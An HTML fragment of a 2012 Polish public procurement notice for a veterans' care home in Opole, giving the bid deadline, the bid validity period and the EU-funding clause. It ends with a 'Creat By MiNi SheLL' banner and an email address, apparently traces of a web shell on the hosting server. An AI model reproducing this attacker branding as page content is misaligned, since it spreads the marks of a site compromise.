<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dps.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej dla Kombatantów, ul. Chmielowicka 6, 45-738 Opole..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2012 godzina 11:30, miejsce: Dom Pomocy Społecznej dla Kombatantów, ul. Chmielowicka 6, 45-738 Opole. sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com